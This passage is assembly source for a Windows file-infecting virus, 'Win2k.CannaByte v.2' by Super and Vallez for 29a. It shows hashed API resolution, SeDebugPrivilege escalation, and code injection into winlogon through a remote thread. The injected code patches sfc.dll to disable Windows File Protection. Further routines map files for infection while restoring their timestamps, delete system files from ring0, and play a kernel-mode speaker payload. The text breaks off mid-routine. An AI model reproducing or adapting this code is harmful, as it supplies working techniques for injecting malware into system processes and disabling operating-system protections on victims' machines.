;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
GetApi:

;eax -> base of dll
;ebx = len api name
;edx = crc of api name
push ebx ecx edx esi edi
push eax
mov eax,[eax + 3ch]
add eax,dword ptr [esp]
;eax -> PE
mov eax,[eax + 78h]
add eax,dword ptr [esp]
;eax -> Export table
push eax
push ebx
mov  ebx,[eax + 20h] 
add  ebx,dword ptr [esp + 8]
;ebx -> Name of functions
push ebx
sub  ebx,4
SearchApiByCRC:
add  ebx,4
mov  esi,[ebx]
add  esi,dword ptr [esp + 12]
CalcLenString 
;ecx = length api.name
mov  edi,[esp + 4]
cmp  edi,ecx
jne  SearchApiByCRC
mov  edi,ecx
push ebx
push edx
callz CRC32
pop  edx
pop  ebx
cmp  eax,edx
jne  SearchApiByCRC
pop  edi
;edi -> name of functions
;ebx -> name of functions + (index of our api * 4)
sub ebx,edi
mov eax,ebx
xor edx,edx
mov ebx,4
div ebx
;eax = index of our api
pop ebx
pop ebx
;ebx -> export
mov ecx,[ebx + 24h]
add ecx,dword ptr [esp]
;ecx -> name ordinals
rol eax,1
add ecx,eax
mov ecx,[ecx]
shr ecx,10h
dec ecx
;ecx = ordinal
mov eax,[ebx + 1ch]
add eax,dword ptr [esp]
;eax -> address of functions
rol ecx,2
add eax,ecx
mov eax,[eax]
add eax,dword ptr [esp]
;eax = address of function searched
pop ebx
pop edi edi edx ecx ebx
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;UnprotectMem sets as writable zone since esi to esi + ecx in ebx process.
;in: 
;   eax -> base of kernel
;   esi -> dir of memory that will be writable.
;   ecx -> bytes of that memory.  
;   ebx -> handle of the process where is the memory.If 0 this process
;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
UnprotectMem:

or ebx,ebx
jne NoThisProcess
push eax 
push esi 
push ecx
GezApi eax,GetCurrentProcessCRC,GCPNameLen
;eax -> GetCurrentProcess
call eax
;eax = hand of this process
mov  ebx,eax
pop  ecx
pop  esi
pop  eax
NoThisProcess:
push ebx
push esi
push ecx
GezApi eax,VirtualProtectExCRC,VPNameLen
;eax -> VirtualProtectEx
pop ecx
pop esi
pop ebx
;ebx = hand of process
;esi = dir
;ecx = nbytes
push eax ;space for receiving lpflOldProtect out parameter
push esp
push PAGE_EXECUTE_READWRITE
push ecx
push esi
push ebx
call eax
pop  eax ;we remove space that we reserve in the stack for out parameter
ret

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;GetLibrarys and FreeLibrarys get and free some librarys :P
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

GetLibrarys:

pushad

;first,ill try to get ntdll base from PEB structure

mov eax,dword ptr fs:[30h]    ;PEB pointer
mov eax,dword ptr [eax + 0ch] ;PEB_LDR_DATA
mov eax,dword ptr [eax + 1ch] ;LIST_ENTRY
mov eax,dword ptr [eax +  8h] ;ntdll.dll base
mov [ebp + Ntdll],eax

mov eax,[ebp + NtKernel]
GezApi eax,LoadLibraryACRC,LLNameLen
push eax
lea ebx,[ebp + advapi]
push ebx
call eax
mov [ebp + NtAdvapi],eax
lea ebx,[ebp + psapi]
push ebx
call dword ptr [esp + 4]
mov [ebp + NtPsapi],eax
lea ebx,[ebp + rasapi]
push ebx
call dword ptr [esp + 4]
mov [ebp + NtRasapi],eax
lea ebx,[ebp + imagehlp]
push ebx
call dword ptr [esp + 4]
mov [ebp + NtImagehlp],eax
pop eax
popad
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
FreeLibrarys:

pushad
mov eax,[ebp + NtKernel]
GezApi eax,FreeLibraryCRC,FLNameLen
push eax
push dword ptr [ebp + NtAdvapi]
call dword ptr [esp + 4]
push dword ptr [ebp + NtPsapi]
call dword ptr [esp + 4]
push dword ptr [ebp + NtRasapi]
call dword ptr [esp + 4]
push dword ptr [ebp + NtImagehlp]
call dword ptr [esp + 4]
pop eax
popad
ret

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;GetWinlogon  in:none  out: WinlogonHand with winlogon process handle
;		  		    eax = 0 if no error
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

GetWinlogon:

pushad
mov ecx,200h
SaveSpaceSearchingWinlogon:
push 00000000h
loop SaveSpaceSearchingWinlogon
;esp -> array of id of processes
mov eax,esp
lea ebx,[ebp + Needed]
push ebx
push 4*200h
push eax
mov eax,[ebp + NtPsapi]
GezApi eax,EnumProcessesCRC,EPSNameLen
call eax
dec eax
jnz GetWinlogonOutError_
;esp -> array
mov esi,esp
lodsd
SearchWinlogon:
lodsd
push esi
or eax,eax
jz GetWinlogonOutError
;vvv
mov [ebp + WinlogonID],eax
push eax
xor eax,eax
push eax
mov eax,10h or 400h or 20h or 2h or 8h
push eax
mov eax,[ebp + NtKernel]
GezApi eax,OpenProcessCRC,OPNameLen
call eax

or eax,eax
jz NoWinlogonFound
;eax = process handle
mov [ebp + WinlogonHand],eax
lea ebx,[ebp + Needed]
push ebx
push 4
lea ebx,[ebp + WinlogonModuleHand]
push ebx
push eax
mov eax,[ebp + NtPsapi]
GezApi eax,EnumProcessModulesCRC,EPMNameLen
call eax
dec eax
jnz NoWinlogonFound
push 50
lea eax,[ebp + WinlogonModuleName]
push eax
push dword ptr [ebp + WinlogonModuleHand]
push dword ptr [ebp + WinlogonHand]
mov eax,[ebp + NtPsapi]
GezApi eax,GetModuleBaseNameACRC,GMBNNameLen
call eax
lea esi,[ebp + WinlogonModuleName]
lodsd
or eax,20202020h
cmp eax,'lniw'
winl equ $ - 4
jne NoWinlogonFound
lodsd 
or eax,20202020h
cmp eax,'nogo'
ogon equ $ - 4
jne NoWinlogonFound

;^^^
WinLogonFound:
pop esi
GetWinlogonOut:
add esp,4*200h
popad
xor eax,eax
ret

NoWinlogonFound:
pop esi
jmp SearchWinlogon

GetWinlogonOutError:
pop esi
GetWinlogonOutError_:
add esp,4*200h
popad
xor eax,eax
inc eax
ret

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;AttackWinlogon in:none
;		   out: eax = 1 error eax = 0 no error
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

AttackWinlogon:

push PAGE_READWRITE
push MEM_RESERVE or MEM_COMMIT
push evirus - svirus
push 0
push dword ptr [ebp + WinlogonHand]
mov eax,[ebp + NtKernel]
GezApi eax,VirtualAllocExCRC,VANameLen
call eax

or eax,eax
jz AttackWinlogonError
mov [ebp + WinlogonVirusBase],eax

mov ecx,[ebp + NtKernel]
mov ebx,[ebp + WinlogonHand]
lea edx,[ebp + svirus]
mov esi,evirus - svirus
Writez ecx,ebx,eax,edx,esi
or eax,eax
jz AttackWinlogonError
push 0
push 0
lea  eax,[ebp + Needed]
push eax;pointer to a variable to be passed to the thread function
mov eax,[ebp + WinlogonVirusBase]
add eax,WinlogonCode - svirus 
push eax
push 0 ;stack size 
push 0
push dword ptr [ebp + WinlogonHand]
mov eax,[ebp + NtKernel]
GezApi eax,CreateRemoteThreadCRC,CRTNameLen
call eax
or eax,eax
jz AttackWinlogonError
 
AttackWinlogonNoError:

push dword ptr [ebp + WinlogonHand]
mov eax,[ebp + NtKernel]
GezApi eax,CloseHandleCRC,CHNameLen
call eax
xor eax,eax
ret

AttackWinlogonError:

push dword ptr [ebp + WinlogonHand]
mov eax,[ebp + NtKernel]
GezApi eax,CloseHandleCRC,CHNameLen
call eax
xor eax,eax
inc eax
ret

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
WinlogonCode:
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;When i inject code to winlogon,i create a remote thread that will start execution here

pop eax ;remove parameter passed
callz WinlogonCodeDoff
WinlogonCodeDoff:
pop ebp
sub ebp,offset WinlogonCodeDoff

SfcDisable:

lea eax,[ebp + sfc]
push eax
mov eax,[ebp + NtKernel]
GezApi eax,LoadLibraryACRC,LLNameLen
call eax
or eax,eax
jz ErrorSfcDisable
mov [ebp + NtSfc],eax
mov esi,[eax + 3ch]
add esi,eax
;esi -> PE
movzx eax,word ptr [esi + 14h];size of optional
mov ecx,[eax + esi + 18h + 10h];size of section
mov esi,[eax + esi + 18h + 0ch];virtual address of first section of sfc.dll
add esi,dword ptr [ebp + NtSfc]


;esi -> code section

SearchCodeToPatch:
pushad
lea edi,[ebp + CodeToSearch]
mov ecx,11
rep cmpsb
popad
je CodeToPatchFound 
inc esi
loop SearchCodeToPatch
jmpz ErrorSfcDisable

CodeToPatchFound:
;now we patch code with a call to ExitThread
push esi
mov eax,[ebp + NtKernel]
GezApi eax,ExitThreadCRC,ETNameLen
pop esi
mov [ebp + PatchExitThreadDir],eax
push esi
;i unprotect the mem where i go to patch
;UnprotectMem
;   eax -> base of kernel
;   esi -> dir of memory that will be writable.
;   ecx -> bytes of that memory.  
;   ebx -> handle of the process where is the memory.If 0 this process
mov eax,[ebp + NtKernel]
mov ebx,0
mov ecx,_PatchCode - PatchCode
callz UnprotectMem
pop esi
mov edi,esi
lea esi,[ebp + PatchCode]
mov ecx,_PatchCode - PatchCode
PatchIt:
movsb
loop PatchIt

;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtKernel]
GezApi eax,ExitThreadCRC,ETNameLen
push 0
call eax
;;;;;;;;;;;;;;;;;;;;;;

sfc db 'sfc.dll'
NtSfc dd 0
CodeToSearch db 6Ah,01h,6Ah,01h,0FFh,33h,0FFh,73h,04h,0FFh,15h
PatchCode:
push 0
mov eax,11111111h
PatchExitThreadDir equ dword ptr $ - 4
call eax
_PatchCode:


ErrorSfcDisable:

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;SECOND VERSION IMPROVEMENT FOR SFC DISABLE
;In the first version the method used for sfc disabling is for win2k only,so in this
;version,if the first one fails, we will try other trickz.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;
SfcDisableImprovement:





;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtKernel]
GezApi eax,ExitThreadCRC,ETNameLen
push 0
call eax
;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;End of code for injecting in winlogon process
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;



;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;MapFile ;it maps the file in _WIN32_FIND_DATA
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

MapFile:

ChangeAttributesOfFile:
lea edi,[ebp + _WIN32_FIND_DATA.WFD_szFileName]
push 80h
push edi
mov eax,[ebp + NtKernel]
GezApi eax,SetFileAttributesACRC,SFANameLen
call eax
push 0
push 0
push 3
push 0
push 1
push 0C0000000h ;read and write access to file
lea eax,[ebp + _WIN32_FIND_DATA.WFD_szFileName]
push eax
mov eax,[ebp + NtKernel]
GezApi eax,CreateFileACRC,CFNameLen
call eax


inc  eax
or   eax,eax
jnz  np1 

ret
np1:
dec  eax
mov  [ebp + FileHandle],eax
push 0
mov  eax,[ebp + _WIN32_FIND_DATA.WFD_nFileSizeLow]
push eax
push 0
push 4
push 0
push dword ptr [ebp + FileHandle]
mov eax,[ebp + NtKernel]
GezApi eax,CreateFileMappingACRC,CFMNameLen
call eax

or   eax,eax
jz  CloseFile
mov [ebp + MappingHandle],eax
push dword ptr [ebp + _WIN32_FIND_DATA.WFD_nFileSizeLow]
push 0
push 0
push 000F001Fh ;access
push eax ;MappingHandle
mov  eax,[ebp + NtKernel]
GezApi eax,MapViewOfFileCRC,MVFNameLen
call eax

or eax,eax
jz CloseMapping
mov [ebp + ViewHandle],eax
ret
;;;;;;;;;;;;;;;;;;;;;;
CloseAll:;close file opened with MapFile

mov eax,[ebp + NtKernel]
GezApi eax,UnmapViewOfFileCRC,UVFNameLen
push dword ptr [ebp + ViewHandle]
call eax

CloseMapping:

mov eax,[ebp + NtKernel]
GezApi eax,CloseHandleCRC,CHNameLen
push dword ptr [ebp + MappingHandle]
call eax

CloseFile:

RestoreAttributes:
lea eax,dword ptr [ebp + _WIN32_FIND_DATA.WFD_ftLastWriteTime]
push eax
lea eax,dword ptr [ebp + _WIN32_FIND_DATA.WFD_ftLastAccessTime]
push eax
lea eax,dword ptr [ebp + _WIN32_FIND_DATA.WFD_ftCreationTime]
push eax
push dword ptr [ebp + FileHandle]
mov eax,[ebp + NtKernel]
GezApi eax,SetFileTimeCRC,SFTNameLen
call eax

mov eax,[ebp + NtKernel]
GezApi eax,CloseHandleCRC,CHNameLen
push dword ptr [ebp + FileHandle]
call eax

push	dword ptr [ebp + _WIN32_FIND_DATA.WFD_dwFileAttributes]
lea	eax, [ebp+ _WIN32_FIND_DATA.WFD_szFileName]
push  eax
mov eax,[ebp + NtKernel]
GezApi eax,SetFileAttributesACRC,SFANameLen
call eax

ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;PayloadRing0.This function is the payload of the virus in ring0.
;When win32k.sys is loaded a song starts in internal speaker.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
PayloadRing0:

Do  equ 600
Re  equ 674 ;(9/8) * Do  ;1.125*Do
Mi  equ 750 ;(5/4) * Do  ;1.25*Do
Fa  equ 798 ;(4/3) * Do  ;1.33*Do
Sol equ 900 ;(3/2) * Do  ;1.5*Do
La  equ 996 ;(5/3) * Do  ;1.66*Do
Si_ equ 1124;(15/8)* Do  ;1.875*Do
Do2 equ 1220
Zilence equ 1

pushfd
pushad

;;;;;;;;;;;;;;;;;;;;;;;
cli
in al, 61h		;save byte in 61h
push ax			
cli
;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;
lea esi,word ptr [ebp + Song]
WhatIfGodSmokedCannabis:
lodsw
mov cx,ax
lodsw
mov dx,ax
or  cx,cx
je  EndSong
callz sound
jmpz WhatIfGodSmokedCannabis
EndSong:
;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;
callz Silence
pop ax              ; Restore information byte in port 61h
out 61h, al		
sti
;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;
popad
popfd
ret
;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;
sound:                  ;cx = frec   dl = duration in second(no more than 13 sec)
pushad
push dx
set_ppi:
mov     al, 10110110b   ; channel 2
out     43h, al         ; operation and mode 3
set_freq:
cmp cx,Zilence
je IsASilence
mov dx,12h
mov ax,34dch
div cx            ; data for frec in ax: 1234dch / (cx = frec)
out 42h, al         
mov al, ah          
out 42h, al		
active_spk:
or  al, 00000011b   
out 61h, al        
xor eax,eax
pop ax		;al = duration in sec
callz WaitX       
popad
ret
IsASilence:
callz Silence
pop ax		;al = duration in sec
callz WaitX       
popad
ret
;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;
WaitX:            ;eax = multiplicator < 19
pushad
mov ecx,1500000h
VelAdjust equ dword ptr $ - 4
mul ecx;*eax
mov ecx,eax
loop $
popad
ret
;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;
Silence:
pushad
in  al, 61h        
and al, 11111100b   ; 0FCh put off speaker
out 61h, al         
popad
ret
;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;
paystrings:
db "Win2k.CannaByte v.2 by Super and Vallez for 29a",0dh,0ah
db "The name of this virus is CannaByte!!!",0dh,0ah
db "I hate avs changed viruses's names",0dh,0ah
db "Plz,no change the name of this ;)",0
;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;
TitleSong:
db "What if god smoked cannabis?",0
Song: 
dw Mi,6,Mi,6,Mi,6,Fa,12,Zilence,3,Mi,6,Mi,6,Mi,6,Mi,6,Re,6,Re,6,Do,9     
dw Mi,6,Mi,6,Mi,6,Fa,12,Zilence,3,Mi,6,Mi,6,Mi,6,Mi,6,Re,6,Re,6,Do,9
dw Mi,6,Mi,6,Mi,6,Mi,6,Fa,12,Zilence,4,Mi,6,Mi,6,Mi,6,Mi,6,Re,6,Re,6,Do,9
dw Mi,6,Mi,6,Mi,6,Mi,6,Fa,12,Zilence,4,Mi,6,Mi,6,Mi,6,Mi,6,Re,6,Re,6,Do,9
dw Mi,15,Zilence,2,Mi,15,Zilence,2,Do,6,Re,6,Mi,6,Mi,6,Zilence,4
dw Mi,15,Zilence,2,Mi,15,Zilence,2,Do,6,Re,6,Mi,6,Mi,6,Zilence,4
dw Mi,15,Zilence,2,Mi,15,Zilence,2,Mi,6,Mi,6,Mi,6,Zilence,6
dw Sol,6,La,6,Si_,9,Mi,6,Mi,6,Fa,6,Sol,12,Zilence,3
dw Sol,6,La,6,Si_,9,Mi,6,Mi,6,Fa,6,Sol,12,Zilence,4
dw Sol,6,La,6,Si_,9,Mi,12,Mi,9,Fa,6,Sol,6,Zilence,1
dw Sol,6,Sol,6,Sol,6,Sol,6,Fa,6,Mi,6,Re,6,Do,18,Zilence,3
dw Sol,9,Sol,9,Sol,9,Sol,9,Fa,9,Mi,9,Re,9,Do,18,0,0
;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;touch_privilege: i got this function from Ratter/29a's document about infection of winlogon.
;The function enable a privilege for me,and ill use to enable SeDebugPrivilege for later ill 
;be able to modify winlogon memory space.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

touch_privilege:

	mov ebx, ebp
touch_privilege_	proc	near
	local	process_token:DWORD
	local	privilege_luid:QWORD
	local	token_privilegez:TOKEN_PRIVILEGES

	pushad
	@SEH_SetupFrame <jmp touch_privilege_end>

	xchg eax, edi

	call dword ptr [ebx+tGetCurrentProcess]
	lea edx, [process_token]
	push edx
	push TOKEN_ADJUST_PRIVILEGES
	push eax
	call dword ptr [ebx+tOpenProcessToken]
	dec eax
	jnz touch_privilege_end

	lea edx, [token_privilegez.TP_luid]
	push edx
	push esi
	push eax
	call dword ptr [ebx+tLookupPrivilegeValueA]
	dec eax
	jnz touch_privilege_close_p_token

	push eax
	push eax
	push type(TOKEN_PRIVILEGES)
	lea edx, [token_privilegez]

	push 1
	pop dword ptr [edx]
	mov dword ptr [edx.TP_attribz], edi

	push edx
	push eax
	push dword ptr [process_token]
	call dword ptr [ebx+tAdjustTokenPrivileges]

touch_privilege_close_p_token:
	push eax
	push dword ptr [process_token]
	call dword ptr [ebx+tCloseHandle]
	pop eax
touch_privilege_end:
	@SEH_RemoveFrame
	mov dword ptr [esp.Pushad_eax], eax
	popad
	leave
	retn

touch_privilege_	endp

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;MapFileRing0 maps a file using kernel mode apis. As MapFile fuction for user 
;mode, MapFileRing0 has a CloseAllRing0 function for saving changes and close handles
;MapFile get the name and directory handle from FileNameRing0 and RootDirectoryRing0
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
MapFileRing0:

pushad

;objects_attributes struc
;	oa_length     dd ?    ;lenght of this structure
;	oa_rootdir    dd ?    
;	oa_objectname dd ?    ;name of the object
;	oa_attribz    dd ?    ;attributes of the object
;	oa_secdesc	  dd ?    
;	oa_secqos     dd ?
;objects_attributes ends
;
;pio_status struc
;	ps_ntstatus   dd ?
;	ps_info       dd ?
;pio_status ends

mov [ebp + FileAttributesRing0.oa_length],24
mov eax,[ebp + RootDirectoryRing0]
mov [ebp + FileAttributesRing0.oa_rootdir],eax
lea eax,[ebp + FileNameRing0]
mov [ebp + FileAttributesRing0.oa_objectname],eax
mov dword ptr [ebp + FileAttributesRing0.oa_attribz],OBJ_CASE_INSENSITIVE
mov dword ptr [ebp + FileAttributesRing0.oa_secdesc],0
mov dword ptr [ebp + FileAttributesRing0.oa_secqos],0

push FILE_OPEN_FOR_BACKUP_INTENT or  \
     FILE_SYNCHRONOUS_IO_NONALERT or \
     FILE_NON_DIRECTORY_FILE			  ;OpenOptions
push FILE_SHARE_READ or \
     FILE_SHARE_WRITE    			  ;Share access
lea eax,[ebp + io_statusRing0]
push eax
lea eax,[ebp + FileAttributesRing0]
push eax
push FILE_READ_DATA    or\
     FILE_WRITE_DATA   or\
     FILE_APPEND_DATA  or\
     STANDART_RIGTHS_REQUIRED			  ;desired access

lea eax,[ebp + FileHandRing0]
push eax
call dword ptr [ebp + ZwOpenFilez]   	  ;I get a handle to the file
							  
test eax,eax
jne  ErrorMappingRing0

mov eax,[ebp + FileHandRing0]
push eax
push SEC_COMMIT 					  ;allocation attributes
push PAGE_READWRITE				  ;page protection
push 00000000h				        ;maximun size
push 00000000h				        ;objects attributes NULL
push SECTION_QUERY       or \			    
     SECTION_MAP_WRITE   or \		    
     SECTION_MAP_READ 	 or \	          
     STANDART_RIGTHS_REQUIRED          	  ;desired access
lea eax,[ebp + SectionHandRing0]
push eax
call dword ptr [ebp + ZwCreateSectionz]    ;I get a handle to a created section
test eax,eax
je np1Ring0
callz Close1Ring0
jmpz ErrorMappingRing0
np1Ring0:						  ;no problem getting section so continue
mov dword ptr [ebp + SectionBaseAddressRing0],0
mov dword ptr [ebp + SectionOffsetRing0],0
mov dword ptr [ebp + SectionOffsetRing0 + 4],0
mov dword ptr [ebp + SectionViewSizeRing0],0

push 00000004h
push 00000000h
push 00000001h
lea eax,[ebp + SectionViewSizeRing0]
push eax
lea eax,[ebp + SectionOffsetRing0]
push eax
push 00000000h
push 00000000h
lea eax,[ebp + SectionBaseAddressRing0]
push eax
push 0FFFFFFFFh   ;i specify the caller process,...i suppose thought im in ring0 this will
			;not give problems.
mov eax,[ebp + SectionHandRing0]
push eax
call dword ptr [ebp + ZwMapViewOfSectionz]      ;I get a view of the section
test eax,eax
je NoErrorMappingRing0
callz Close2Ring0
jmpz ErrorMappingRing0


NoErrorMappingRing0:
popad
mov eax,[ebp + SectionBaseAddressRing0]
ret


ErrorMappingRing0:
popad
xor eax,eax
ret

;;;;;;;;;;;;;;;;;;;;;;
CloseAllRing0:

Close3Ring0:

push dword ptr [ebp + SectionBaseAddressRing0]
push 0FFFFFFFFh
call dword ptr [ebp + ZwUnmapViewOfSectionz] ;I unmap the view of the section

Close2Ring0:

push dword ptr [ebp + SectionHandRing0]
call dword ptr [ebp + ZwClosez]       	   ;I close the hand to the section

Close1Ring0:

push dword ptr [ebp + FileHandRing0]
call dword ptr [ebp + ZwClosez]              ;I close the hand to the file

ret

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;GetApisRing0 gets some apis coz we need to be fast when we r in the hook rutine,or the 
;system will go slowly...We cant to be using all time GezApi
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
GetApisRing0:

pushfd
pushad

mov eax,[ebp + Ntoskrnl]
GezApi eax,ZwUnmapViewOfSectionCRC,ZUVOSNameLen
mov [ebp + ZwUnmapViewOfSectionz],eax

mov eax,[ebp + Ntoskrnl]
GezApi eax,ZwCloseCRC,ZCNameLen
mov [ebp + ZwClosez],eax

mov eax,[ebp + Ntoskrnl]
GezApi eax,ZwMapViewOfSectionCRC,ZMVOSNameLen
mov [ebp + ZwMapViewOfSectionz],eax

mov eax,[ebp + Ntoskrnl]
GezApi eax,ZwOpenFileCRC,ZOFNameLen
mov [ebp + ZwOpenFilez],eax						 

mov eax,[ebp + Ntoskrnl]
GezApi eax,ZwCreateSectionCRC,ZCSNameLen
mov [ebp + ZwCreateSectionz],eax

popad
popfd
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;DeleteWin32ksy will delete win32k.sy file if still not deleted
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
DeleteWin32ksy:
pushfd
pushad

;From Ring3 part we have in Buffer system32 path in ansi string. We will use StringRing0
;for creating a unicode string with win32k.sy name.

lea edi,[ebp + StringRing0]

lea esi,[ebp + StartUnicode]
mov ecx,8
xor eax,eax
CopyStartUnicode:
movsb
loop CopyStartUnicode

lea esi,[ebp + Buffer]
CalcLenString
push ecx
xor eax,eax
CopyPathSystem32:
movsb
stosb
loop CopyPathSystem32

mov al,'\'
stosb
xor eax,eax
stosb

lea esi,[ebp + win32ksy]
CalcLenString
xor eax,eax
CopyFileNameWin32ksy:
movsb
stosb
loop CopyFileNameWin32ksy

;we have in StringRing0 'pathsystem32\win32k.sy'

pop ecx    ;len of path of system32 in ansi
shl ecx,1  ;len in unicode
add ecx,28 ;len of that path  + len of \??\ and win32k.sy name in ecx

mov word ptr [ebp + FileNameRing0.us_Length],cx
mov word ptr [ebp + FileNameRing0.us_MaximumLength],cx
lea eax,[ebp + StringRing0]
mov [ebp + FileNameRing0.us_Buffer],eax

;usually deletion of files is done with a specific call to NtSetInformationFile. With this
;call the file is deleted when last handle to it is closed. However ill use other 
;undocumented api,ZwDeleteFile. With ZwDeleteFile the file is deleted without waiting
;last handle was closed.

lea  eax,[ebp + FileNameRing0]
mov  dword ptr [ebp + FileAttributesRing0.oa_objectname],eax
mov  dword ptr [ebp + FileAttributesRing0.oa_length] ,24
mov  dword ptr [ebp + FileAttributesRing0.oa_rootdir],0
mov  dword ptr [ebp + FileAttributesRing0.oa_attribz],40h
mov  dword ptr [ebp + FileAttributesRing0.oa_secdesc],0h
mov  dword ptr [ebp + FileAttributesRing0.oa_secqos] ,0h

lea eax,dword ptr [ebp + FileAttributesRing0]
push eax
